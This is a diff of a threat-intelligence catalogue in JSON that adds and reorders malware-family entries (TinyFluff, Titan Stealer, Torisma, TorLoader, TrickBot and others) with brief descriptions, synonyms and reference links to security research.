"http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", + "http://contagiodump.blogspot.com/2012/06/amazon.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ "Illi", @@ -47282,13 +49498,26 @@ "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", "value": "Tinba" }, + { + "description": "TinyFluff is a dropper developed by the OldGremlin group. In one of their March '22 campaigns, TinyFluff included a JavaScript RAT with a time-independent DGA.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff", + "https://www.group-ib.com/blog/oldgremlin-comeback/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e044c397-8491-466b-adb7-2deead4d9eb6", + "value": "TinyFluff" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", - "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", "https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf", + "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak" ], @@ -47303,17 +49532,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/", + "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://twitter.com/VK_Intel/status/1273292957429510150", + "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", "https://github.com/SherifEldeeb/TinyMet", "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/", - "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", - "https://twitter.com/VK_Intel/status/1273292957429510150", - "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/" + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "TiniMet" @@ -47329,16 +49559,16 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", "https://asec.ahnlab.com/en/27346/", - "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", - "https://asec.ahnlab.com/en/32781/", - "https://krebsonsecurity.com/tag/nuclear-bot/", + "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", + "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", - "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", - "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", + "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", + "https://krebsonsecurity.com/tag/nuclear-bot/", "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" + "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", + "https://asec.ahnlab.com/en/32781/", + "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702" ], "synonyms": [ "MicroBankingTrojan", @@ -47370,8 +49600,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", "https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" ], "synonyms": [], @@ -47385,8 +49615,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla", - "https://blog.talosintelligence.com/2021/09/tinyturla.html", - "https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/" + "https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/", + "https://blog.talosintelligence.com/2021/09/tinyturla.html" ], "synonyms": [], "type": [] @@ -47407,12 +49637,14 @@ "value": "Tiop" }, { - "description": "Information stealer written in Go.", + "description": "The stealer is written in Go and capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.titan_stealer", - "https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign", - "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html" + "https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219", + "https://github.com/D4NTESCODE/TitanStealerSource", + "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html", + "https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign" ], "synonyms": [], "type": [] @@ -47425,17 +49657,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", + "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", - "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", "https://vblocalhost.com/uploads/VB2020-20.pdf", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op", - "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger" + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" ], "synonyms": [ "LuckyBack" @@ -47450,25 +49682,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", - "https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/", - "https://intel471.com/blog/privateloader-malware", - "https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet", - "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/", - "https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4", "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-2-inmemoryconfig-store-vaccine/", - "https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/", - "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", - "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", - "https://www.cert.pl/en/news/single/tofsee-en/", - "https://blog.talosintelligence.com/tofsee-spam/", - "https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897~.asp", + "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/", "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining", + "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", + "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", + "https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4", + "https://intel471.com/blog/privateloader-malware", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", - "https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining" + "https://www.cert.pl/en/news/single/tofsee-en/", + "https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/", + "https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897~.asp", + "https://blog.talosintelligence.com/tofsee-spam/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/", + "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/" ], "synonyms": [ "Gheg" @@ -47507,13 +49740,13 @@ "value": "tomiris" }, { - "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.", + "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files \u2013 temp.txt and temp2.txt \u2013 within the same directory of its execution.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf", "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/", - "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", - "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" + "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], "type": [] @@ -47526,7 +49759,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.toneshell", - "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html" + "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [], "type": [] @@ -47562,13 +49796,14 @@ "value": "Topinambour" }, { - "description": "", + "description": "Torisma is a complex HTTP(S) downloader, that can serve as an orchestrator handling the execution of additional payloads from the C&C server.\r\n\r\nIt uses VEST-32 for encryption and decryption of network traffic between the client and the server. \r\n\r\nTypically, it uses these parameter names for its HTTP POST requests: ACTION, CODE, CACHE, REQUEST, RES. It sends the victim's MAC address in the initial request.\r\n\r\nThe response of the server informing the client about a successful authentication is \"Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}\". The client then requests additional data from the server, that decrypts to shellcode and its data parameters, and is executed. The client also creates a named pipe, \\\\.\\pipe\\fb4d1181bb09b484d058768598b, that allows inter-process communication with the executed shellcode. \r\n\r\nTorisma was usually downloaded by NedDnLoader, and deployed in the Operation DreamJob campaigns starting around Q4 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma", - "http://blog.nsfocus.net/stumbzarus-apt-lazarus/", - "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf", + "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", + "http://blog.nsfocus.net/stumbzarus-apt-lazarus/", + "https://www.telsy.com/lazarus-gate/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/" ], "synonyms": [], @@ -47593,12 +49828,26 @@ "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", "value": "TorrentLocker" }, + { + "description": "Downloader, delivered via a lure with fake exploits published on Github.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader", + "https://vulncheck.com/blog/fake-repos-deliver-malicious-implant" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b6c84477-198f-42ea-808b-e20b23271cd0", + "value": "TorLoader" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove", - "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970" + "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970", + "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/" ], "synonyms": [], "type": [] @@ -47624,8 +49873,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye", - "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/", - "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/" + "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/", + "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/" ], "synonyms": [], "type": [] @@ -47651,11 +49900,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.gdatasoftware.com/blog/trat-control-via-smartphone", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.gdatasoftware.com/blog/trat-control-via-smartphone" + "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns" ], "synonyms": [], "type": [] @@ -47668,9 +49917,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", + "http://adelmas.com/blog/treasurehunter.php", "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", - "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html", - "http://adelmas.com/blog/treasurehunter.php" + "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" ], "synonyms": [ "huntpos" @@ -47685,284 +49934,287 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/", - "https://home.treasury.gov/news/press-releases/jy1256", - "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", - "https://www.youtube.com/watch?v=KMcSAlS9zGE", - "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", - "https://labs.vipre.com/trickbots-tricks/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks", - "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-076a", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/", - "https://community.riskiq.com/article/04ec92f4", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", - "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/", - "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://community.riskiq.com/article/111d6005/description", - "https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", - "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", - "https://unit42.paloaltonetworks.com/ryuk-ransomware/", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", - "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/", - "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure", - "https://www.youtube.com/watch?v=EdchPEHnohw", - "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/", - "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/", - "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/", - "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", - "https://cofenselabs.com/all-you-need-is-text-second-wave/", - "https://www.secdata.com/the-trickbot-and-mikrotik/", - "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", - "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", - "https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/", - "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/", - "https://www.hhs.gov/sites/default/files/bazarloader.pdf", - "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/", - "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/", - "https://www.wired.com/story/trickbot-malware-group-internal-messages/", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis", - "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", - "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", - "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", - "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/", - "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", - "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/", - "https://www.secureworks.com/research/threat-profiles/gold-ulrick", - "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", - "https://arcticwolf.com/resources/blog/karakurt-web", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://osint.fans/service-nsw-russia-association", - "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", - "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", - "https://securelist.com/trickbot-module-descriptions/104603/", - "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", - "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", - "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", - "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", - "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", - "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/", - "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", - "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", - "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", - "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", - "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", - "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", - "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", - "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", - "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/", - "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "http://www.malware-traffic-analysis.net/2018/02/01/", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", - "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/", - "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/", - "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf", - "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet", - "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/", - "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf", - "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.ic3.gov/Media/News/2022/220120.pdf", - "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows", - "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html", - "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/", - "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/", - "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", - "https://blog.talosintelligence.com/2020/03/trickbot-primer.html", - "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573", - "https://community.riskiq.com/article/298c9fc9", - "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", - "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass", - "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", - "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor", - "https://www.mandiant.com/media/12596/download", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", - "https://www.joesecurity.org/blog/498839998833561473", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf", - "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", - "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/", - "http://www.secureworks.com/research/threat-profiles/gold-blackburn", - 